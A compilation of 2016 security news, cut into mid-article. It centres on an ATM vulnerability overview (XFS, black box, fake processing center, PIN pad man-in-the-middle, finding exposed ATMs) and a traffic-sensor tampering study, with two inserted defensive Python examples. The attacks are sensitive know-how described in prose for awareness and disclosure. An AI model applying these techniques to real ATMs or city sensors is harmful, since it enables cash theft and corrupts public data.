All devices are connected to the system unit, which in this case performs the function of the host (as we shall refer to it) via the USB or RS232 ports (often referred to as a COM port). Sometimes these ports are located directly on the system unit; if there aren’t enough ports, a USB/COM hub is used. Older ATM models can still be found that are connected via the SDC bus.
Software
The software used on almost every ATM is straightforward:

operating system
ATM units management software
software used to interact with the user (ATM consumer or operator)
software used to communicate with the processing center (which provides the information and technological sides of the transaction)
anti-virus software, or integrity control software.

This is sufficient for the ATM to carry out its immediate functions, but for some reason certain banks also install Acrobat Reader 6.0, Radmin, TeamViewer and other unnecessary and in some cases even dangerous software.
When it comes to the operating system, the vast majority of ATMs still use … Windows XP, despite the fact that Microsoft stopped issuing security updates for it in April 2014. Any vulnerability discovered in this system since then will remain unpatched. The engineers servicing ATMs often think that if the ATM is working, it is better “not to touch” (read: “not to update”) it. As a consequence, some cash machines still have the unpatched critical vulnerability MS08-067, which allows remote code execution.
ATM units are implemented on microcontrollers running real-time operating systems (RTOS), which is particularly irksome for the IDA Pro crowd because static analysis of such systems is almost unheard of.
That’s basically all the information cybercriminals need to start hacking.
Malware
In 2009, the appearance of Trojan Backdoor.Win32.Skimer caught the world’s attention: it was the first malicious program targeting ATMs. Skimer attacked ATMs from a particular manufacturer – one of the market leaders. Using this malicious program the criminals emptied the cash dispensers and also skimmed the data from bank cards processed in infected ATMs. Since then, ATMs of different manufacturers have been repeatedly exposed to malware infection.
The process of stealing money from ATMs using malware consists of four stages:

The attacker gains local/remote access to the machine.
Malicious code is injected into the ATM system.
As a rule, infection is followed by rebooting of the ATM. The system seems to reboot in standard mode but at the same time comes under the control of a malicious program, i.e. cybercriminals.
The final stage, i.e. the main aim of the process, is the theft of money.

Getting access to the inside of an ATM is not a particularly difficult task, as the experts at the Positive Hack Days, the international forum on practical information security, demonstrated. The process of infecting is also fairly clear – arbitrary code can be executed on an insecure (or insufficiently secure) system. There seems to be no problem with withdrawing money either – the malware interface is usually opened by using a specific key combination on the PIN pad or by inserting a “special card”, and then all you need to do is stuff your pockets full of cash.
Here we will focus on how a malicious program can gain control of an ATM.
The XFS standard
So the attackers have infected the ATM system unit. What next?
Here again, a short explanation is required. As already mentioned, the ATM is managed by a Windows-based application. Its task is to organize the interaction between the user (customer or service staff), the processing center, which sends commands to the ATM, and the equipment that executes those commands. Message exchange with the processing center uses a direct-connect protocol (NDC or DDC); users interact with the GUI; and service providers (the drivers that act as gateways to each unit) are responsible for operating each ATM unit. To send commands to the service providers and on to the equipment, and to receive status messages back, a layer called the XFS Manager is used, in accordance with WOSA.

ATM operations in the context of the XFS standard
XFS (CEN/XFS, and earlier WOSA/XFS), or the eXtensions for Financial Services, is a standard that provides a client-server architecture for financial applications on the Microsoft Windows platform, especially peripheral devices such as ATMs. XFS is intended to standardize software so that it can work on any equipment regardless of the manufacturer, and provides a common API for this purpose.
Thus, any application that is developed with the XFS standard in mind can control low-level objects by using only the logic described in this standard. And that application could well be the Tyupkin backdoor or any other malicious program.
What opportunities does XFS offer?
For example, the dispenser, which is the most interesting unit for attackers, can be made to give out money without authorization. On some ATM models, the use of XFS means cybercriminals can manipulate the code to open the safe and unlock the ATM cassettes.
Exploitation of the MS08-067 vulnerability, allowing execution of arbitrary code. The video was shot by experts at BlackHat Europe 2014
With regard to the card reader, XFS allows the reading and recording of data from the bank card magnetic stripe and even retrieval of the transaction history stored on the EMV card chip.
Of special note is the Encrypting PIN Pad (EPP). It is believed that the PIN cannot be intercepted because it is entered on the ATM PIN pad and is converted directly inside the encryption module into a PIN block (EPP contains keys to do this, two of which are in the bank’s Hardware Security Module). However, XFS allows the PIN pad to be used in two modes:

Open Mode – for entering different numeric values, such as the sum to be withdrawn;
Secure Mode, which EPP switches to in order to enter a PIN and encryption keys.

This allows cybercriminals to implement a “man-in-the-middle” (MiTM) attack. They only have to intercept the command sent from the host to the EPP to switch to Secure Mode and then to inform the device that work is continuing in Open Mode. In the reply message, the EPP will send the keystrokes as plain text – exactly what the attacker needs.
But what about authentication and exclusive access? And surely the standard’s specifications are inaccessible?
Unfortunately, this is not the case with XFS. The standard does not provide any authentication, and exclusive access to service providers is implemented, but not for security reasons. This is just a single-threaded command sending function to avoid accidentally breaking delicate hardware by simultaneously sending two identical commands.
Surprisingly, although it is a standard for financial applications, it doesn’t even mention security. Where can you find the specifications to check if this is true? Just try entering “ATM XFS” in any search engine and you’ll find the answer among the first few results.
Integrity control software
Banks sometimes use integrity control software on their ATMs that supposedly prevents the execution of unauthorized code based on a whitelist, controls connected devices and drives, as well as providing other useful methods which should, in theory, counter attacks.
But we shouldn’t forget that first of all it is software, and just like any other software, it’s not perfect. It may be vulnerable to attacks such as kiosk mode bypass, whitelist bypass, buffer overflows, privilege escalation to the SYSTEM user, etc. As you know, existing vulnerabilities often allow cybercriminals to gain access to the operating system and to do their dirty work.
Undocumented features
The bad guys may use modified utilities that were originally provided by ATM developers or manufacturers to test a machine’s operability. One of the functions of these utilities is to test the dispenser function, including the dispensing of cash. In order to carry out a test, the engineer has to confirm his legitimacy by opening the safe door or performing actions with the dispenser cassettes. The logic is simple: if you can open the safe, you have the key, i.e. you are a licensed engineer or a cash-in-transit guard. But by simply replacing a couple of bytes in the utility, the “right” people can “test” cash withdrawals without any checks.
Yet another way criminals have of lining their pockets is to change the denomination of banknotes dispensed by the ATM using a diagnostic utility. As a result, the attacker receives banknotes with the largest nominal value (e.g., a 100 dollar/euro banknote) while the ATM “thinks” it is dispensing the smallest of the available denominations (five or ten). It means several hundred thousand can be withdrawn from a card with a balance of just a few hundred.
Black box
So-called black box attacks are another type of attack that is getting increased coverage in the news. On surveillance camera videos the following occurs: someone opens the service zone, connects a magic box to the ATM, closes the cabinet and leaves. A little later several people who appear to be customers approach the ATM and withdraw huge sums of money. Of course, the criminals retrieve their little device from the ATM once they have achieved their goal. Usually, these black box attacks are only discovered a few days later when the empty cassettes and the withdrawal logs don’t tally, leaving the bank employees scratching their heads.
However, there is no magic involved – the attackers connect a specially programmed microcomputer to the dispenser in such a way that it bypasses the security measures implemented on the host (antivirus, integrity control, full disk encryption, etc.).
Communications insecurity
As mentioned above, USB, RS232, or SDC can be used as a data transmission channel between the system unit and the devices. It’s likely that nothing will prevent the attackers from sending the necessary commands directly to the device port, bypassing its service provider. The standard interfaces often do not require any specific drivers. Authorization is not required either, which basically makes these insecure proprietary protocols an easy target – just sniff and replay. The result is direct control over ATM units and the use of undocumented functions (e.g., changing the unit firmware). The criminals may also use a software or hardware traffic analyzer, installing it directly on the port of a particular device such as a card reader in order to obtain the transmitted data. And this analyzer will be difficult to detect.
Direct control over the dispenser means the ATM cassettes can be emptied without any entries being made in the ATM software logs.

A typical packet – the command to dispense a banknote from the first cassette of the dispenser
For those who are unaware, it may look like magic. Every great magic trick consists of three parts or acts. Here, they are dispensing money from the cassette, opening the shutter, and presenting the money to the client.
A black box attack on an ATM. The video was prepared by experts for demonstration purposes at BlackHat Europe 2014
Hardware skimmers are ‘so yesterday’. A direct connection makes it possible to read and record the magnetic stripe of a credit card. Traffic analyzers, which are freely available on the Internet, can also be used for such a direct connection. Rumor has it that in one fairly large bank all the ATMs were used as skimmers: the attackers had found vulnerabilities in the bank’s network and installed a USB sniffer on the ATMs, allowing them to collect bank card data in plain text for five years! Who knows, maybe your card was among those affected.

The intercepted data of a Track2 card
The network
The connection between ATMs and the processing center can be protected in various ways: for example, with a hardware or software VPN, SSL/TLS encryption, a firewall, or the MAC authentication implemented in the xDC protocols. However, all these measures often appear so complex to banks that they don’t bother using any network protection at all.
In such cases, a MiTM attack can be launched that will result in the attacker getting both bank card data and all the money in the ATM. This requires remote access to the device, which is usually obtained by using vulnerable services that can be accessed from the Internet, as well as social engineering techniques. Physical access to the network hardware, including the ATM’s Ethernet cable, will also suffice.
On the way to the real processing center a fake one pops up; it sends commands to the ATM software to dispense banknotes. Withdrawing money is possible with any card, even one that has expired or has a zero balance, as long as the fake processing center “recognizes” it. A fake processing center can be either “homemade” software that supports communication with the ATM via the xDC-protocol, or a processing center simulator originally designed to check network settings (yet another “gift” from the vendors to the cybercriminals).

The commands for giving out 40 banknotes from the fourth cassette sent from a fake processing center and stored in the ATM software logs. They look almost like the real thing.
Where do the criminals find ATMs that can be attacked via the network? Do they scan all the nearby networks or buy the information on underground forums?
It turns out that you just need to enter the correct query in a search engine – https://www.shodan.io/ (this Internet of Things scanner is well known to experts). The data collected by this scanner is usually enough to launch such attacks.
#Shodan shows thousands of exposed ATMs potentially vulnerable to a network attack @_endless_quest_ #TheSAS2016 pic.twitter.com/9E3SSYwG89
— Eugene Kaspersky (@e_kaspersky) February 9, 2016

Or you could just take a closer look at the ATMs in retail and business centers.

Sometimes the ATM system can be accessed without even opening it – all the communications are located on the outside
Who’s to blame and what can be done
This part is usually the most depressing, and here’s why.
When we detect a vulnerability while analyzing ATM security, we send a notification to the vendor with a description of the problem and ways to solve it. And often the answers are bewildering:
“The vulnerabilities are essentially normal specifications of the card readers and not unexpected. As long as the ATM is running within normal parameters, these problems cannot possibly occur.”
“However, this vulnerability is inherent in the USB technology and is expected to be mitigated by the use of appropriate physical controls on access to the ATM top box.”
“We regret informing you that we had decided to stop producing this model more than 3 years ago and warranties for our distributors have expired.”
Indeed, why should vendors bother about ATMs with expired warranties that are still used by banks around the world, and whose physical security often leaves much to be desired? Unfortunately, reality shows that manufacturers are only interested in selling new products and not in eliminating the shortcomings of existing systems, while banks lack the necessary skills to cope with the problems on their own.
Fortunately, some manufacturers understand the dangers of unauthorized ATM use, and release security updates. To prevent attacks on dispensers, two-way authentication and cryptography are used. It should be noted, however, that not all cryptography is correctly implemented cryptography.
While the existing countermeasures can protect ATMs from malware, they are powerless against black box or network attacks. A huge number of security flaws and vulnerabilities that can be exploited with minimum expertise make cash machines a prime target for those desperate to get rich illegally.
So. Is everything lost?
ATM manufacturers can reduce the risk of attack on cash machines.

Firstly, it is necessary to revise the XFS standard with an emphasis on security, and introduce two-way authentication between devices and legitimate software. This will help reduce the likelihood of unauthorized money withdrawals using Trojans and of attackers gaining direct control over ATM units.
Secondly, it is necessary to implement “authenticated dispensing” to exclude the possibility of attacks via fake processing centers.
Thirdly, it is necessary to implement cryptographic protection and integrity control over the data transmitted between all hardware units and the PC inside the ATM.
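The second and third recommendations (two-way authentication and integrity control on the host-to-unit link) can be illustrated with a small model of an authenticated dispense channel. This is an added example, not code from the article or from any ATM vendor: it does not model XFS, NDC/DDC or real firmware, and the message format, field names and shared-key provisioning are assumptions made for the example. It shows why a sniffed-and-replayed or edited dispense packet, which the article describes as trivially accepted today, would be rejected.

```python
import hashlib
import hmac
import json
import os

# Constructed illustration of an authenticated host <-> dispenser channel.
# Assumptions: both units share a 32-byte key provisioned out of band, every
# message is a canonical JSON body followed by an HMAC-SHA256 tag, and the host
# numbers commands with a strictly increasing counter (freshness / anti-replay).
TAG_LEN = 32


def _encode(fields: dict) -> bytes:
    """Canonical encoding so host and dispenser MAC exactly the same bytes."""
    return json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()


def _seal(key: bytes, body: bytes) -> bytes:
    """Append the integrity tag; anyone without the key cannot produce it."""
    return body + hmac.new(key, body, hashlib.sha256).digest()


def _open(key: bytes, msg: bytes):
    """Return the decoded body if the tag verifies, otherwise None."""
    if len(msg) <= TAG_LEN:
        return None
    body, tag = msg[:-TAG_LEN], msg[-TAG_LEN:]
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        return None
    return json.loads(body)


class Host:
    """ATM application side: signs commands and verifies the unit's replies."""

    def __init__(self, key: bytes):
        self.key = key
        self.counter = 0

    def dispense(self, cassette: int, count: int) -> bytes:
        self.counter += 1
        body = _encode({"ctr": self.counter, "cassette": cassette, "count": count})
        return _seal(self.key, body)

    def check_reply(self, reply: bytes, expected_ctr: int) -> str:
        """Two-way authentication: the reply must be signed and bound to our command."""
        fields = _open(self.key, reply)
        if fields is None:
            return "reply rejected: bad MAC"
        if fields["ctr"] != expected_ctr:
            return "reply rejected: wrong counter"
        return fields["status"]


class Dispenser:
    """Dispenser side: acts only on commands with a valid tag and a fresh counter."""

    def __init__(self, key: bytes, cassettes: dict):
        self.key = key
        self.last_ctr = 0
        self.cassettes = dict(cassettes)  # cassette number -> notes remaining

    def receive(self, msg: bytes) -> tuple:
        cmd = _open(self.key, msg)
        if cmd is None:
            # Forged or modified bytes: nothing dispensed, no signed reply issued.
            return "rejected: bad MAC", None
        if cmd["ctr"] <= self.last_ctr:
            status = "rejected: replay"  # an old, valid packet played back
        else:
            self.last_ctr = cmd["ctr"]  # counter is consumed even on failure
            if cmd["count"] > self.cassettes.get(cmd["cassette"], 0):
                status = "rejected: insufficient notes"
            else:
                self.cassettes[cmd["cassette"]] -= cmd["count"]
                status = "dispensed"
        reply = _seal(self.key, _encode({"ctr": cmd["ctr"], "status": status}))
        return status, reply


def demo() -> list:
    """Legitimate command, replay of it, an edited copy, and a forgery without the key."""
    key = os.urandom(32)
    host, unit = Host(key), Dispenser(key, {1: 100, 4: 100})
    out = []
    msg = host.dispense(cassette=1, count=1)
    status, reply = unit.receive(msg)
    out.append(status)                                  # "dispensed"
    out.append(host.check_reply(reply, host.counter))   # "dispensed"
    out.append(unit.receive(msg)[0])                    # "rejected: replay"
    body, tag = msg[:-TAG_LEN], msg[-TAG_LEN:]
    edited = body.replace(b'"count":1', b'"count":40') + tag
    out.append(unit.receive(edited)[0])                 # "rejected: bad MAC"
    forged = _seal(os.urandom(32), _encode({"ctr": 99, "cassette": 4, "count": 40}))
    out.append(unit.receive(forged)[0])                 # "rejected: bad MAC"
    return out
```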

And what should banks do? They need to take action!
Encourage those who sell ATMs and software to make them secure. The manufacturer must eliminate vulnerabilities as soon as possible; it is necessary to tell them about it as often as possible. To prevent the hacking of ATMs it is necessary to make use of all the available protection tools. A completed PCI DSS Self-Assessment Questionnaire is not a silver bullet and won’t protect ATMs from attacks, or banks from financial and reputational losses. Proactive protection, including regular ATM security assessment and penetration testing, is better (and often much cheaper) than a security incident and the subsequent investigation.
Bad guys are watching.
Stay safe!
PS: No cash machines were harmed in the preparation of this material.
PPS: This overview of the security issues in cash machines is not intended as a hacking guide.



Sirin Labs to sell mysterious SP1 phone for the privacy conscious

An international group of investors announced today that Sirin Labs, a startup with $72 million in venture funding, is planning to create a smartphone that combines premium performance and functionality with strong privacy protection.
Sirin’s announcement gave few details about the device, internally dubbed the SP1, but the company says that interested parties won’t have long to wait for additional information, as it should go on sale within the next two months. The SP1’s design, according to Sirin, will attempt to graft high-end flagship features onto a far greater emphasis on security than most modern smartphones.
The group is led by the founders of Israeli VC firm Singulariteam, Moshe Hogeg and Kenges Rakishev, along with former Googler and startup veteran Tal Cohen, who serves as CEO. Sirin has also employed a former product director for Sony Mobile, Fredrik Oijer.



Spammers all geared up for Euro 2016!

Major football tournaments such as the World Cup and the European Championship traditionally attract a lot of spammer activity. Euro 2016 will be held this summer in France, and it’s not only the fans and players who are getting ready but also Internet fraudsters. The latter have started sending out fake notifications about lottery wins dedicated to the upcoming tournament. Their emails often contain attachments adorned with graphic elements including official emblems, the Euro 2016 logo and those of its sponsors.

The contents of the attachments are the standard stuff: the lottery was held by an authorized organization, the recipient’s address was randomly selected from a large number of email addresses, and in order to claim your prize you have to reply to the email and provide some personal information. We have recorded cases where the same attachment was sent in messages with a different text, but the theme of the email is essentially the same. The fraudsters also use different email addresses and change those used in the body of the message and the attachment.
We have also come across advertising spam in different languages, for example in Dutch, asking recipients to buy a 2-euro commemorative coin issued specifically for Euro 2016.

We expect to see a growth in football-themed spam as the start date of Euro 2016 approaches. This type of fraudulent spam can be one of the most dangerous for users: the perpetrators are unlikely to limit their activity to fake lotteries, and will start spreading various emails offering the chance to win tickets to the games, as was the case before the World Cup in Brazil. The amount of spam targeting users in France, which is hosting the championship, may also increase.



The FBI paid more than $1 million to hack the San Bernardino iPhone

In the San Bernardino case, it turned out that the FBI didn’t actually need Apple’s help to access the data in shooter Syed Rizwan Farook’s iPhone 5c. But if Apple had helped, it certainly would have been cheaper.

Speaking at a security conference in London, FBI Director James Comey was asked how much the bureau paid the third-party gray-hat hackers for the tool that broke into the iPhone. “A lot, more than I will make in the remainder of this job, which is seven years and four months, for sure. But it was in my view worth it.”



Opera browser build adds a first: Free, unlimited VPN for secure surfing

After successfully launching a version of its browser that offered ad blocking, Opera just won’t quit. On Wednesday night, the company released a free VPN service with unlimited bandwidth, built right into its latest beta. The Opera release is developer edition version 38.0.2204.0 for the Mac and the PC.
Opera also won’t make you pay for the amount of bandwidth that you route through the VPN—which would normally cost you about $48 per year.
A virtual private network spoofs your IP address, pretending that your PC is actually physically located in London, for example, when it’s actually sitting in Los Angeles. That offers all sorts of possibilities: It helps hide your identity when surfing, or allows you access to a website that you normally wouldn’t be able to see. VPNs are also common in countries like China, whose so-called “Great Firewall” insulates the Chinese Internet from the rest of the world.



Viber joins WhatsApp and Apple with end-to-end message encryption

Not wanting to be left behind in the pursuit of enhanced user security, Viber is adding end-to-end encryption (E2EE) following WhatsApp’s E2EE roll out earlier in April. Viber announced on Tuesday that E2EE would roll out to its users globally over the next two weeks. The new encryption will cover text, voice, and group chats, and will work across mobile and PC versions of Viber.

Viber with end-to-end encryption.



Microsoft cites new EU personal data rules in support of email dispute

Microsoft has cited new European data protection rules in support of its claim that the U.S. government should use inter-governmental agreements rather than a warrant to force the technology company to provide emails stored in Ireland that are required for an investigation.

The General Data Protection Regulation was adopted last week by the European Parliament with the aim of providing a unified data protection regime across member states. It was earlier adopted by the Council of the EU, and is to come into effect a little over two years after its publication in the EU Official Journal. The legislation will replace the EU Data Protection Directive, which dates back to 1995.



Apple rebuts DOJ's appeal in N.Y. meth dealer's iPhone case

Apple last week opposed the Department of Justice’s renewed demand that it assist investigators in accessing a drug dealer’s iPhone, arguing that the government has not proved the company’s help is required.

“The government has utterly failed to satisfy its burden to demonstrate that Apple’s assistance in this case is necessary,” lawyers for the Cupertino company said in a brief (PDF) filed with a federal court in New York on Friday. “The government has made no showing that it has exhausted alternative means for extracting data from the iPhone at issue here, either by making a serious attempt to obtain the passcode from the individual defendant who set it in the first place … or by consulting other government agencies and third parties known to the government.”



How to trick traffic sensors

A detailed presentation of this research was delivered at RSA US 2016, and is available at https://www.rsaconference.com/writable/presentations/file_upload/tech-t09-smart-megalopolises.-how-safe-and-reliable-is-your-data.pdf
In the past two years traffic sensors have mushroomed in Russian cities. Drivers using speed camera detectors were the first to spot the white boxes stuck to posts along the roadside. Their devices, designed to warn drivers about traffic enforcement cameras, react to the signals emanating from the new sensors in the same way they do to the radar guns used by traffic police. Helping enforce the speed limit is merely a positive side effect, however; the city authorities installed the sensors for a completely different reason. The devices count the number of cars of varying size in each lane, determine their average speed, and send the data to a unified traffic control center.

A traffic sensor in Moscow
As a result, the city authorities receive information about traffic intensity, which allows them to, for example, adjust traffic light phasing or plan further road infrastructure. The weekly reports issued by Moscow’s traffic authorities present information about the slowest and the fastest highways, based on data coming from both the Center for Road Traffic Management and from Yandex. While the latter’s data comes from apps running on users’ smartphones, the former would not be able to collect its data without the road infrastructure that will be discussed here.

Each week the Moscow city authorities publish data about the city’s fastest and slowest highways
These sensors are the lowest tier of ‘smart city’ infrastructure – they collect raw data about traffic and pass it on; without that data, no analysis can be done and systems cannot be configured properly. Therefore, the information coming from the sensors has to be accurate. But is that actually the case? Can an outsider manipulate the operation of the sensors and the information that they collect? We will try to answer these questions and identify any improvements that can be made to the urban IT infrastructure.
How to search for devices and information about them
Any research begins by collecting all the available data, and research into embedded systems, to which traffic sensors belong, is no exception. Even in a narrow market segment, you cannot know all sensor types and models by sight unless you are dealing with them professionally every day. The odds are that you won’t be able to immediately identify the manufacturer of a device by just looking at it. This makes all the logos and manufacturer labels on devices all the more valuable.
If you do succeed in identifying the model of a road sensor just by looking at it, you can find various documentation on the vendor’s site (or that of their integrator), and, if you are lucky enough, you will also find the software used for working with the devices. You will almost certainly find a marketing leaflet about your device; there is also a good chance you will find a larger sales-oriented document. It is also not uncommon to come across documentation, but finding a full-fledged technological description with the device’s command system is a rare piece of luck.
It is practical to automate the process of working with the sensors, so you don’t have to sit under each and every device with a laptop. Nowadays, such automation is quite normal – wireless connections are no longer a rarity for ‘smart city’ components. However, to ensure such automation, you first need to know which communication protocol each sensor uses, and how to separate the devices you need from all the other devices.
For this purpose, you can use any identifiers, including peculiarities in how the devices communicate their data. For example, most MAC addresses are reserved for specific manufacturers (however, anonymous MAC addresses also exist). As well as numeric IDs, devices also typically have alphabetic names that may follow some type of standard, for example the device model plus an incremental index.
All of this makes it possible to write a scanner to search for devices that are of interest to us. One of the sensor models installed in Moscow uses Bluetooth for data communication. These devices have both MAC addresses and ‘friendly names’ that are quite distinctive, so we can add only these traffic sensors to the list and filter out all nearby smartphones and TV sets. A discussion on Bluetooth security goes beyond the scope of this topic, so we will not talk here of compromising Bluetooth devices. We informed the Moscow city authorities about the configuration drawbacks in November 2015.

Traffic sensor records saved to a database
I used Python, PostgreSQL and a bit of C. In real time, as I drive by each traffic sensor, the scanner identifies each device’s MAC address, friendly name and coordinates. The fields with the vendor name and the physical address are filled out later on a separate pass through the database based on the data already collected. Determining the device’s physical address from coordinates is, to a certain degree, a time-consuming procedure, so it shouldn’t be done simultaneously while searching for devices. Establishing a Bluetooth connection is not fast either, so if you want to find traffic sensors, you’ll have to drive slowly.
What can be done with the firmware
The openness shown by the manufacturers to installation engineers, their readiness to give them access to tools and documents, automatically means they are open to researchers. (I respect this sort of approach; in my view, this sort of openness combined with a ‘bug bounty’ approach yields better results than secrecy.) After selecting any of the identified sensors, you can install the device configuration software supplied by the vendor on your laptop, drive to the location (the physical address saved in the database), and connect to the device.
As we do in any research of embedded system security, we first of all check if it’s possible to reinstall the firmware on the device.

The configuration software allows the firmware on the traffic sensor to be changed
Yes, we can install new firmware on the device via this wireless connection designated for servicing purposes. It is just as easy to find the manufacturer’s firmware as it is its software. The firmware looks reminiscent of Intel iHex or Motorola SREC, but this is the manufacturer’s proprietary format. If we remove the overhead information (‘:’ – the write instruction, serial numbers, memory addresses and checksums) from the data blocks for the digital signal processor (DSP) and the main processing unit (MPU), we obtain the clean code. However, we don’t know the architecture of the controllers in the device, so we cannot simply open the file with a disassembler.

The traffic sensor firmware
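The overhead the author strips (the ‘:’ marker, byte counts, addresses, record types and checksums) is exactly the structure of the Intel HEX format the firmware resembles. The following parser is an added example, not the manufacturer’s tooling or format: the real sensor uses a proprietary container, so this only demonstrates the Intel HEX variant, verifies each record’s checksum before trusting its bytes, and reassembles the clean code into address-keyed segments. The sample records are constructed for the example.

```python
# Intel HEX record parser (added example; the sensor's own format is proprietary
# and only resembles this). Each text record is:
#   ':' <count:1 byte> <address:2 bytes> <type:1 byte> <data:count bytes> <checksum:1 byte>
# and the checksum is the two's complement of the sum of every preceding byte.
RECORD_DATA = 0x00
RECORD_EOF = 0x01
RECORD_EXT_SEGMENT = 0x02   # data << 4 becomes the new base address
RECORD_EXT_LINEAR = 0x04    # data << 16 becomes the new base address
RECORD_START_ADDRESS = (0x03, 0x05)  # entry-point records: carry no image data

# Constructed sample: 4 bytes at 0x0000, then a base switch to 0x08000000
# followed by two contiguous records at offsets 0x0010 and 0x0014, then EOF.
SAMPLE_HEX = """\
:040000000200003CBE
:020000040800F2
:04001000DEADBEEFB4
:020014000102E7
:00000001FF
"""


def parse_record(line: str) -> dict:
    """Decode one record and reject it unless length and checksum are consistent."""
    line = line.strip()
    if not line.startswith(":"):
        raise ValueError("record must start with ':'")
    raw = bytes.fromhex(line[1:])  # raises ValueError on non-hex or odd length
    if len(raw) < 5:
        raise ValueError("record too short")
    count = raw[0]
    if len(raw) != 5 + count:
        raise ValueError(f"byte count {count} does not match record length")
    addr = int.from_bytes(raw[1:3], "big")
    rtype = raw[3]
    # Sum of all bytes including the checksum must be 0 modulo 256.
    if sum(raw) & 0xFF != 0:
        raise ValueError(f"checksum mismatch in record at address 0x{addr:04X}")
    return {"type": rtype, "addr": addr, "data": raw[4:4 + count]}


def extract_image(lines) -> dict:
    """Strip record overhead and return {absolute_start: bytes} of contiguous code."""
    base = 0
    segments = []  # list of [start, bytearray], merged while records are contiguous
    for line in lines:
        if not line.strip():
            continue
        rec = parse_record(line)
        if rec["type"] == RECORD_EOF:
            break
        if rec["type"] == RECORD_EXT_LINEAR:
            base = int.from_bytes(rec["data"], "big") << 16
        elif rec["type"] == RECORD_EXT_SEGMENT:
            base = int.from_bytes(rec["data"], "big") << 4
        elif rec["type"] == RECORD_DATA:
            addr = base + rec["addr"]
            if segments and segments[-1][0] + len(segments[-1][1]) == addr:
                segments[-1][1].extend(rec["data"])
            else:
                segments.append([addr, bytearray(rec["data"])])
        elif rec["type"] not in RECORD_START_ADDRESS:
            raise ValueError(f"unsupported record type 0x{rec['type']:02X}")
    return {start: bytes(buf) for start, buf in segments}


if __name__ == "__main__":
    for start, code in extract_image(SAMPLE_HEX.splitlines()).items():
        print(f"0x{start:08X}: {code.hex()}")
```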
Oddly enough, LinkedIn helps out here – it’s not just a handy resource for careerists and HR departments. Sometimes the device architecture is not a secret, and engineers who used to work for the manufacturer may be willing to talk about it. Now, as well as the file, we also have an understanding of the architecture which the firmware was compiled for. However, our good fortune only lasts until we launch IDA.

You can find the controller types even if they aren’t specified in the documentation
Even when we know the architecture, the firmware remains a meaningless jumble of bytes. However, we could find out from the same engineer how exactly the firmware is encrypted, as well as the encryption algorithms and key tables. I didn’t have the device to hand, so at that stage I decided this black box mode of firmware modification was showing little promise, and set it aside. We have to admit that in this specific case the microelectronics engineers know how to protect firmware. However, this did not mean the end of the road for our sensor research.
Only trucks travel at night
Firmware modification is “good” in that new functional capabilities can be added. However, there is sufficient functionality in the manufacturer’s standard software. For example, the device has about 8 MB of memory that is used to keep a copy of traffic data until the memory is full. This memory can be accessed. The firmware allows you to change the way that passing vehicles are classified according to their length, or change the number of lanes. Would you like a copy of the information collected on traffic? No problem. Would you like to classify all vehicles as trucks driving in the right lane? You can do that too. Of course, this will affect the accuracy of the statistics that are collected, with all ensuing consequences.

Sample of the data traffic sensors collect and pass along. The same data is stored on the device
If someone wants to get a copy of Moscow traffic statistics or manipulate the data, they will have to walk or drive around all the traffic sensors; however, they won’t have to launch software for each of the thousands of sensors and modify the settings manually. In this specific case, there is a description of the proprietary system of commands for the devices. This is not something that you come across a lot when researching embedded systems. In any case, after establishing a connection to the traffic sensor using the manufacturer’s software, the commands are no longer a secret – they are visible using a sniffer. Here, though, there is a description in English that saves us the trouble of analyzing the machine-level communication protocol.

Documented device commands make traffic analysis unnecessary
Bluetooth services are not actually implemented on the traffic sensor; the wireless protocol in this case is only a data communication medium. The data is communicated via a regular serial port. Software handling of such ports is no different from reading and writing files, so the code for sending commands is trivial. For these purposes, it’s not even necessary to implement the usual multithreaded port handling – it’s sufficient to send bytes and receive the response in a single thread.
To sum up, a car driving slowly around the city, a laptop with a powerful Bluetooth transmitter and scanner software are capable of recording the locations of traffic sensors, collecting traffic information from them and, if desired, changing their configurations. I wouldn’t say that traffic stats are a major secret, but tampering with sensor configurations could affect their validity. And that data could be used as a basis for controlling ‘smart’ traffic lights and other traffic equipment.

The sensor sent a response: the command has been accepted. Because we know the command system, it is easy to ‘translate’ the response
What can be done?
It turns out that the answers to both questions we raised at the beginning are negative: traffic data is not protected, and it can be manipulated. Why is that? Well, there was no authorization except that required for Bluetooth, and that was not configured properly. The manufacturer of the road sensors we examined is very generous when it comes to service engineers, with a lot of information about the devices publicly available on the manufacturer’s official website and elsewhere. Personally, I agree with the manufacturer and respect them for this, as I don’t think the “security through obscurity” approach makes much sense these days; anyone determined enough will find out the command system and gain access to the engineering software. In my view, it makes more sense to combine openness, bug bounty programs and a fast response to any identified vulnerabilities, if for the only reason that the number of researchers will always be bigger than the number of employees in any information security department.
At the installation stage, it makes sense to avoid using any standard identifiers. Obviously, manufacturers need to advertise their products, and the servicing teams may need to collect additional information from the adhesive labels on a device, but besides the convenience there are also issues of information security to consider. Last but not least, it’s not worth relying solely on the standard identification implemented in well-known protocols. Any additional proprietary protection that is properly implemented will be relevant and make penetration much more difficult.
A detailed presentation of this research was delivered at RSA US 2016, and is available on the RSA conference website.



Chrome extensions will soon have to tell you what data they collect

Google is about to make it harder for Chrome extensions to collect your browsing data without letting you know about it, according to a new policy announced Friday.
Starting in mid-July, developers releasing Chrome extensions will have to comply with a new User Data Policy that governs how they collect, transmit and store private information. Extensions will have to encrypt personal and sensitive information, and developers will have to disclose their privacy policies to users.
Developers will also have to post a “prominent disclosure” when collecting sensitive data that isn’t related to a prominent feature. That’s important, because extensions have tremendous power to track users’ browsing habits and then use that for nefarious purposes.



Microsoft sues US government over secret requests for user data

Microsoft has sued the U.S. government in an attempt to strike down a law allowing judges to gag tech companies when law enforcement agencies want access to their users’ data.

The lawsuit, filed Thursday in the U.S. District Court for the Western District of Washington, argues that a section of the Electronic Communications Privacy Act is unconstitutional for requiring tech companies to keep requests for data under wraps. 

Microsoft argued the law is unconstitutional under the First Amendment, by limiting the company’s freedom of speech, as well as under the Fourth Amendment’s due process protections. 



EU gives companies two years to comply with sweeping new privacy laws

Companies could face massive fines in 25 European Union countries if they mishandle citizens’ personal information, under a new privacy law due to take effect in 2018.
New age restrictions will mean no more Facebook or other social media for European pre-teens.
Today, fines for violations of EU data protection rules are typically limited to a few tens of thousands of euros, or hundreds of thousands in exceptional cases. That’s hardly enough to upset companies such as Facebook or Google, which both reported billions of dollars in net income last year.
From 2018, though, data protection authorities will be able to impose fines of up to 4 percent of a company’s worldwide revenue for breaches of the new privacy rules approved by the European Parliament on Thursday afternoon. For Google, the fine itself could now be in the billions of dollars. 



Apple probably won’t find out how the FBI hacked the San Bernardino iPhone

